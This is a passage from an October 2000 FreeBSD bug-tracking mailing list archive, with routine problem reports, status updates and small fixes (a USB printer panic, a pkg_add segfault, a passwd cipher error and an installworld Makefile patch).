#22 0x804dbe9 in ?? () #23 0x804b5cd in ?? () #24 0x804db8e in ?? () #25 0x804acd5 in ?? () #26 0x804ab37 in ?? () #27 0x804a1e1 in ?? () ====================================================================== I can't report the content of sc structure (stack frame #13, ulptclose) because the pointer was zeroed at some point. >How-To-Repeat: === /etc/printcap === # LABEL apsfilter # apsfilter setup ×Ó 29 ÏËÔ 2000 16:48:56 CET # # DON'T DELETE THIS: # APS_BASEDIR:/usr/local/apsfilter # # APS1_BEGIN:printer1:lj5mono:a4:1200x600 # - don't delete start label for apsfilter printer1 # - no other printer defines between BEGIN and END LABEL # lp|aps1-lj5mono-a4-auto-1200x600|Printer1 lj5mono a4 auto 1200x600:\ :lp=/dev/ulpt0:\ :sd=/var/spool/lpd/printer1-lj5mono-a4-auto-1200x600:\ :lf=/var/spool/lpd/printer1-lj5mono-a4-auto-1200x600/log:\ :af=/var/spool/lpd/printer1-lj5mono-a4-auto-1200x600/acct:\ :if=/usr/local/apsfilter/filter/aps1-lj5mono-a4-auto-1200x600:\ :mx#0:\ :sh: raw|aps2-lj5mono-a4-raw|Printer1 lj5mono a4 raw:\ :lp=/dev/lpt0:\ :sd=/var/spool/lpd/printer1-lj5mono-a4-raw:\ :lf=/var/spool/lpd/printer1-lj5mono-a4-raw/log:\ :af=/var/spool/lpd/printer1-lj5mono-a4-raw/acct:\ :if=/usr/local/apsfilter/filter/aps2-lj5mono-a4-raw:\ :mx#0:\ :sf:\ :sh: # APS1_END - don't delete this END LABEL for printer1 === /etc/printcap === Printing to lp generates the panic. >Fix: No known. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 9:34: 8 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5830737B479; Sun, 29 Oct 2000 09:34:07 -0800 (PST) Received: (from alex@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA17750; Sun, 29 Oct 2000 09:34:06 -0800 (PST) (envelope-from alex@FreeBSD.org) Date: Sun, 29 Oct 2000 09:34:06 -0800 (PST) From: Message-Id: <200010291734.JAA17750@freefall.freebsd.org> To: alex@FreeBSD.org, freebsd-bugs@FreeBSD.org, cg@FreeBSD.org Subject: Re: kern/21693: hwptr went backwards 2112 -> 1312 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: hwptr went backwards 2112 -> 1312 Responsible-Changed-From-To: freebsd-bugs->cg Responsible-Changed-By: alex Responsible-Changed-When: Sun Oct 29 09:32:55 PST 2000 Responsible-Changed-Why: I think Cameron suppressed this warning lately. He shall decide what to do with this PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=21693 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 9:37:27 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0570E37B479; Sun, 29 Oct 2000 09:37:26 -0800 (PST) Received: (from alex@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA18969; Sun, 29 Oct 2000 09:37:25 -0800 (PST) (envelope-from alex@FreeBSD.org) Date: Sun, 29 Oct 2000 09:37:25 -0800 (PST) From: Message-Id: <200010291737.JAA18969@freefall.freebsd.org> To: ismailsyed@schoolcity.com, alex@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/21713: Getting an error message in Free BSD while loggin in Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Getting an error message in Free BSD while loggin in State-Changed-From-To: open->closed State-Changed-By: alex State-Changed-When: Sun Oct 29 09:35:45 PST 2000 State-Changed-Why: This is a problem of your network setup, probably. The handbook and the FAQ describe how to setup FreeBSD correctly. Please take a look: http://www.freebsd.org/handbook/ and /faq/ http://www.freebsd.org/cgi/query-pr.cgi?pr=21713 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10: 2: 5 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3CC1A37B661; Sun, 29 Oct 2000 10:01:59 -0800 (PST) Received: (from dillon@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA26791; Sun, 29 Oct 2000 10:01:59 -0800 (PST) (envelope-from dillon@FreeBSD.org) Date: Sun, 29 Oct 2000 10:01:59 -0800 (PST) From: Message-Id: <200010291801.KAA26791@freefall.freebsd.org> To: dillon@FreeBSD.org, freebsd-bugs@FreeBSD.org, dillon@FreeBSD.org Subject: Re: kern/11629: File descriptor table sharing is broken Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: File descriptor table sharing is broken Responsible-Changed-From-To: freebsd-bugs->dillon Responsible-Changed-By: dillon Responsible-Changed-When: Sun Oct 29 10:01:04 PST 2000 Responsible-Changed-Why: I'm working up a patch set to fix the file descriptor races. The problem is even more severe then originally reported ... things like ioctl can blow up too. http://www.freebsd.org/cgi/query-pr.cgi?pr=11629 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:30: 5 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 650C537B4C5 for ; Sun, 29 Oct 2000 10:30:03 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA36975; Sun, 29 Oct 2000 10:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 29 Oct 2000 10:30:03 -0800 (PST) Message-Id: <200010291830.KAA36975@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Matthew Jacob Subject: Re: kern/9619: Restarting mountd kills existing mounts Reply-To: Matthew Jacob Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/9619; it has been noted by GNATS. From: Matthew Jacob To: freebsd-gnats-submit@FreeBSD.org, crossd@cs.rpi.edu Cc: Subject: Re: kern/9619: Restarting mountd kills existing mounts Date: Sun, 29 Oct 2000 10:25:03 -0800 This is still a problem in -current. It's quite annoying. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:30: 7 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C481737B4CF for ; Sun, 29 Oct 2000 10:30:05 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA36997; Sun, 29 Oct 2000 10:30:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 29 Oct 2000 10:30:05 -0800 (PST) Message-Id: <200010291830.KAA36997@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Matthew Jacob Subject: Re: bin/21253: dump/restore fail on any stream (tape/pipe/file) over 4GB Reply-To: Matthew Jacob Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/21253; it has been noted by GNATS. From: Matthew Jacob To: freebsd-gnats-submit@FreeBSD.org, bigfoot@stomped.com Cc: Subject: Re: bin/21253: dump/restore fail on any stream (tape/pipe/file) over 4GB Date: Sun, 29 Oct 2000 10:28:24 -0800 I don't believe we can reproduce this. I believe this should be closed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:31: 0 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 52B1337B4C5; Sun, 29 Oct 2000 10:30:59 -0800 (PST) Received: (from mjacob@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA37279; Sun, 29 Oct 2000 10:30:59 -0800 (PST) (envelope-from mjacob@FreeBSD.org) Date: Sun, 29 Oct 2000 10:30:59 -0800 (PST) From: Message-Id: <200010291830.KAA37279@freefall.freebsd.org> To: plm@xs4all.nl, mjacob@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/2698: After rewind I cannot read a tape; blocksize problems Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: After rewind I cannot read a tape; blocksize problems State-Changed-From-To: open->closed State-Changed-By: mjacob State-Changed-When: Sun Oct 29 10:29:49 PST 2000 State-Changed-Why: Old bug- and in this was, in fact, pilot error as they weren't using the right minor to match the fixed blocksize. http://www.freebsd.org/cgi/query-pr.cgi?pr=2698 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:32:29 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3F23137B4D7; Sun, 29 Oct 2000 10:32:27 -0800 (PST) Received: (from mjacob@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA37827; Sun, 29 Oct 2000 10:32:27 -0800 (PST) (envelope-from mjacob@FreeBSD.org) Date: Sun, 29 Oct 2000 10:32:27 -0800 (PST) From: Message-Id: <200010291832.KAA37827@freefall.freebsd.org> To: john@vapornet.net, mjacob@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/5624: dumping to tape causes scsi bus reset Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: dumping to tape causes scsi bus reset State-Changed-From-To: open->closed State-Changed-By: mjacob State-Changed-When: Sun Oct 29 10:31:21 PST 2000 State-Changed-Why: Obsolete by now. At any rate, it looked more like some kind oif problem where a reset at the disk killed the tape. http://www.freebsd.org/cgi/query-pr.cgi?pr=5624 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:34:10 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 55CAA37B479; Sun, 29 Oct 2000 10:34:09 -0800 (PST) Received: (from mjacob@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA38505; Sun, 29 Oct 2000 10:34:09 -0800 (PST) (envelope-from mjacob@FreeBSD.org) Date: Sun, 29 Oct 2000 10:34:09 -0800 (PST) From: Message-Id: <200010291834.KAA38505@freefall.freebsd.org> To: J.Klaus@sh.cvut.cz, mjacob@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/9759: Tar process hangs on buggy tapes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Tar process hangs on buggy tapes State-Changed-From-To: open->feedback State-Changed-By: mjacob State-Changed-When: Sun Oct 29 10:33:13 PST 2000 State-Changed-Why: Is this problem exist for you still in later FreeBSD releases? http://www.freebsd.org/cgi/query-pr.cgi?pr=9759 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:35:41 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B14FB37B479; Sun, 29 Oct 2000 10:35:39 -0800 (PST) Received: (from mjacob@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA39095; Sun, 29 Oct 2000 10:35:39 -0800 (PST) (envelope-from mjacob@FreeBSD.org) Date: Sun, 29 Oct 2000 10:35:39 -0800 (PST) From: Message-Id: <200010291835.KAA39095@freefall.freebsd.org> To: jhs@freebsd.org, mjacob@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/12062: sa tape driver with Cipher 60M SCSI QIC tape drive on 3.2 is droping last 10K block. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sa tape driver with Cipher 60M SCSI QIC tape drive on 3.2 is droping last 10K block. State-Changed-From-To: open->feedback State-Changed-By: mjacob State-Changed-When: Sun Oct 29 10:35:12 PST 2000 State-Changed-Why: Did you try some of the suggestions I made? http://www.freebsd.org/cgi/query-pr.cgi?pr=12062 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:40: 3 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 45BF637B479; Sun, 29 Oct 2000 10:40:01 -0800 (PST) Received: (from mjacob@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA40499; Sun, 29 Oct 2000 10:40:01 -0800 (PST) (envelope-from mjacob@FreeBSD.org) Date: Sun, 29 Oct 2000 10:40:01 -0800 (PST) From: Message-Id: <200010291840.KAA40499@freefall.freebsd.org> To: ben@algroup.co.uk, mjacob@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/11112: Amanda on FreeBSD can wipe the _next_ tape! Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Amanda on FreeBSD can wipe the _next_ tape! State-Changed-From-To: open->feedback State-Changed-By: mjacob State-Changed-When: Sun Oct 29 10:39:02 PST 2000 State-Changed-Why: Is this a problem in 3.4 and later? http://www.freebsd.org/cgi/query-pr.cgi?pr=11112 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:40: 7 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E1D8637B479 for ; Sun, 29 Oct 2000 10:40:03 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA40538; Sun, 29 Oct 2000 10:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 29 Oct 2000 10:40:03 -0800 (PST) Message-Id: <200010291840.KAA40538@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Matthew Jacob Subject: Re: bin/12107: Add switch to dump to support multiple dumps on one tape Reply-To: Matthew Jacob Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/12107; it has been noted by GNATS. From: Matthew Jacob To: freebsd-gnats-submit@FreeBSD.org, thompson@tgsoft.com Cc: Subject: Re: bin/12107: Add switch to dump to support multiple dumps on one tape Date: Sun, 29 Oct 2000 10:38:06 -0800 It's not quite clear to me why the -a argument doesn't/didn't (hope you didn't die of old age waiting for a responnse :-)) work for you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 10:41:50 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 436DC37B479; Sun, 29 Oct 2000 10:41:49 -0800 (PST) Received: (from mjacob@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA41176; Sun, 29 Oct 2000 10:41:49 -0800 (PST) (envelope-from mjacob@FreeBSD.org) Date: Sun, 29 Oct 2000 10:41:49 -0800 (PST) From: Message-Id: <200010291841.KAA41176@freefall.freebsd.org> To: mjacob@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/17791: Restore does not handle bad or missing tapes well. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Restore does not handle bad or missing tapes well. Class-Changed-From-To: sw-bug->change-request Class-Changed-By: mjacob Class-Changed-When: Sun Oct 29 10:41:05 PST 2000 Class-Changed-Why: This is a change request. http://www.freebsd.org/cgi/query-pr.cgi?pr=17791 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 11:56:24 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freeby.ben.algroup.co.uk (sockittome.aldigital.co.uk [194.128.162.252]) by hub.freebsd.org (Postfix) with SMTP id 7156437B479; Sun, 29 Oct 2000 11:56:21 -0800 (PST) Received: from algroup.co.uk (naughty.ben.algroup.co.uk [193.133.15.107]) by freeby.ben.algroup.co.uk (8.6.12/8.6.12) with ESMTP id TAA26435; Sun, 29 Oct 2000 19:56:42 GMT Message-ID: <39FC80FB.32D6525F@algroup.co.uk> Date: Sun, 29 Oct 2000 19:56:43 +0000 From: Ben Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.75 [en] (WinNT; U) MIME-Version: 1.0 To: mjacob@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/11112: Amanda on FreeBSD can wipe the _next_ tape! References: <200010291840.KAA40499@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't know. Cheers, Ben. mjacob@FreeBSD.org wrote: > > Synopsis: Amanda on FreeBSD can wipe the _next_ tape! > > State-Changed-From-To: open->feedback > State-Changed-By: mjacob > State-Changed-When: Sun Oct 29 10:39:02 PST 2000 > State-Changed-Why: > Is this a problem in 3.4 and later? > > http://www.freebsd.org/cgi/query-pr.cgi?pr=11112 -- http://www.apache-ssl.org/ben.html "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." Robert Woodruff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 12: 1:37 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 24C0637B4CF; Sun, 29 Oct 2000 12:01:34 -0800 (PST) Received: (from ume@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA68601; Sun, 29 Oct 2000 12:01:34 -0800 (PST) (envelope-from ume@FreeBSD.org) Date: Sun, 29 Oct 2000 12:01:34 -0800 (PST) From: Message-Id: <200010292001.MAA68601@freefall.freebsd.org> To: jim@thehousleys.net, ume@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/18621: Adding ip6fw/firewall support for IPv6 to rc.* Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Adding ip6fw/firewall support for IPv6 to rc.* State-Changed-From-To: open->closed State-Changed-By: ume State-Changed-When: Sun Oct 29 11:59:48 PST 2000 State-Changed-Why: Thanks! I just committed new rc.network6 and rc.firewall6. The rules should be brushed up. http://www.freebsd.org/cgi/query-pr.cgi?pr=18621 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 15:40: 6 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 27E5737B661 for ; Sun, 29 Oct 2000 15:40:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47227; Sun, 29 Oct 2000 15:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id D3D5D37B479; Sun, 29 Oct 2000 15:30:54 -0800 (PST) Message-Id: <20001029233054.D3D5D37B479@hub.freebsd.org> Date: Sun, 29 Oct 2000 15:30:54 -0800 (PST) From: cjuniet@yahoo.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/22401: pkg_add -r does a segmentation fault Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22401 >Category: bin >Synopsis: pkg_add -r does a segmentation fault >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 29 15:40:00 PST 2000 >Closed-Date: >Last-Modified: >Originator: Christophe Juniet >Release: 4.1.1-STABLE i386 >Organization: >Environment: FreeBSD quark.dyndns.org 4.1.1-STABLE FreeBSD 4.1.1-STABLE #0: Sun Oct 29 13:22:35 CET 2000 root@quark.dyndns.org:/usr/src/sys/compile/QUARK i386 >Description: On -STABLE, since revision 1.16.2.10, pkg_add -r does a segmentation fault if it is given any argument. In /usr/src/lib/libfetch/ftp.c, line 890 if (!strchr(flags, 'd') && (purl = _ftp_get_proxy()) != NULL) does a segmentation fault because flags is NULL. >How-To-Repeat: pkg_add -r foo >Fix: In /usr/src/lib/libfetch/ftp.c, lines 890 and 937 and 971 should be if (!(flags && strchr(flags, 'd')) && (purl = _ftp_get_proxy()) != NULL) or it should use CHECK_FLAG as in -CURRENT if (!CHECK_FLAG('d') && (purl = _ftp_get_proxy()) != NULL) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 15:48:53 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2123237B4C5; Sun, 29 Oct 2000 15:48:52 -0800 (PST) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA50084; Sun, 29 Oct 2000 15:48:52 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Sun, 29 Oct 2000 15:48:52 -0800 (PST) From: Message-Id: <200010292348.PAA50084@freefall.freebsd.org> To: billf@FreeBSD.org, freebsd-bugs@FreeBSD.org, des@FreeBSD.org Subject: Re: bin/22401: pkg_add -r does a segmentation fault Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: pkg_add -r does a segmentation fault Responsible-Changed-From-To: freebsd-bugs->des Responsible-Changed-By: billf Responsible-Changed-When: Sun Oct 29 15:47:59 PST 2000 Responsible-Changed-Why: Dag-Erling already committed a fix (of a fix) in -current, I suppose this serves as a reminder to merge before 4.2-RELEASE http://www.freebsd.org/cgi/query-pr.cgi?pr=22401 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 17: 0:10 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E6AE37B4F9 for ; Sun, 29 Oct 2000 17:00:02 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA75212; Sun, 29 Oct 2000 17:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id AA2A337B4D7; Sun, 29 Oct 2000 16:57:00 -0800 (PST) Message-Id: <20001030005700.AA2A337B4D7@hub.freebsd.org> Date: Sun, 29 Oct 2000 16:57:00 -0800 (PST) From: jywang@pixart.com.tw To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/22404: Solution of "passwd" and "cannot set password cipher" in 4.1.1 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22404 >Category: bin >Synopsis: Solution of "passwd" and "cannot set password cipher" in 4.1.1 >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 29 17:00:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: J.Y.Wang. >Release: 4.1.1-STABLE >Organization: PixArt Imaging Inc. >Environment: $ uname -a FreeBSD proxy.pixart.com.tw 4.1.1-STABLE FreeBSD 4.1.1-STABLE #0: Sat Oct 28 03:02:26 CST 2000 root@proxy.pixart.com.tw:/ usr/obj/usr/src/sys/JYWANG i386 >Description: Bugs when you just update your FreeBSD 4.1-STABLE box to FreeBSD 4.1.1-STABLE. You cannot change your passwd and got a "cannot set password cipher" message. >How-To-Repeat: # passwd foo Changing local password for foo. New password: Retype new password: passwd: cannot set password cipher: Undefined error: 0 passwd: /etc/master.passwd: unchanged >Fix: You must treat 4.1.1-STABLE a brand-new version from 4.1-STABLE. That is, just like /usr/src/UPDATING says, you must do a make buildworld make buildkernel KERNEL=YOUR_KERNEL_HERE make installkernel KERNEL=YOUR_KERNEL_HERE reboot (in single user) [1] make installworld mergemaster reboot Then you¡¦ll solve this problem on your own self. I wrote three scripts for "at" use foo.stg1: cd /usr/src make buildworld make buildkernel KERNEL=GENERIC make installworld KERNEL=GENERIC reboot foo.stg2: cd /usr/src make buildkernel KERNEL=JYWANG make installkernel KERNEL=JYWANG mv /kernel.old /kernel.GENERIC reboot foo.stg3: cd /usr/src make installworld mergemaster reboot After three "at" all the night, all "passwd" problems were gone! >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 20:30: 9 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4EA0137B4C5 for ; Sun, 29 Oct 2000 20:30:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA53153; Sun, 29 Oct 2000 20:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from area51.v-wave.com (area51.v-wave.com [24.108.52.213]) by hub.freebsd.org (Postfix) with SMTP id DAB6037B479 for ; Sun, 29 Oct 2000 20:23:48 -0800 (PST) Received: (qmail 45149 invoked by uid 0); 30 Oct 2000 04:23:42 -0000 Message-Id: <20001030042341.45148.qmail@area51.v-wave.com> Date: 30 Oct 2000 04:23:41 -0000 From: cwasser@v-wave.com Reply-To: cwasser@.v-wave.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/22405: installworld still bombs on perl and other packages Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22405 >Category: kern >Synopsis: installworld still bombs on perl and other packages >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Oct 29 20:30:00 PST 2000 >Closed-Date: >Last-Modified: >Originator: Chris Wasser >Release: FreeBSD 4.1.1-STABLE i386 >Organization: N/A >Environment: FreeBSD area51.v-wave.com 4.1.1-STABLE FreeBSD 4.1.1-STABLE #0: Thu Oct 19 18:37:27 MDT 2000 root@area51.v-wave.com:/usr/src/sys/compile/AREA51 i386 >Description: Installworld still fails with missing chmod, sort, tr. Temporary fix was submitted to freebsd-stable by Warner Losh on Tue, 29 Aug 2000 14:28:39 -0600 Can reliably produce same results on fresh new sources. Seems to be still related with perl build in buildworld. >How-To-Repeat: This seems to happen when either updated sources from previous 4.x cvsups and even fresh new sources from cvs respository. To reproduce, cvsup sources and buildworld, then installworld. Had to patch 6 different machines yesterday, all with this problem. If this is in error (can't see how 6 fresh boxes can be wrong) then please disregard. >Fix: --- Makefile.inc1 Sat Oct 28 23:05:51 2000 +++ Makefile.inc1 Sun Oct 29 21:12:27 2000 @@ -298,9 +298,9 @@ # installworld: mkdir -p ${INSTALLTMP} - for prog in [ awk cat chflags chown date echo egrep find grep \ - install ln make makewhatis mtree mv perl rm sed sh sysctl \ - test true uname wc zic; do \ + for prog in [ awk cat chflags chmod chown date echo egrep find grep \ + install ln make makewhatis mtree mv perl rm sed sh sort sysctl \ + test tr true uname wc zic; do \ cp `which $$prog` ${INSTALLTMP}; \ done cd ${.CURDIR}; ${IMAKE} reinstall >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Oct 29 22: 0:15 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7A8B137B479 for ; Sun, 29 Oct 2000 22:00:03 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA84682; Sun, 29 Oct 2000 22:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 29 Oct 2000 22:00:03 -0800 (PST) Message-Id: <200010300600.WAA84682@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: 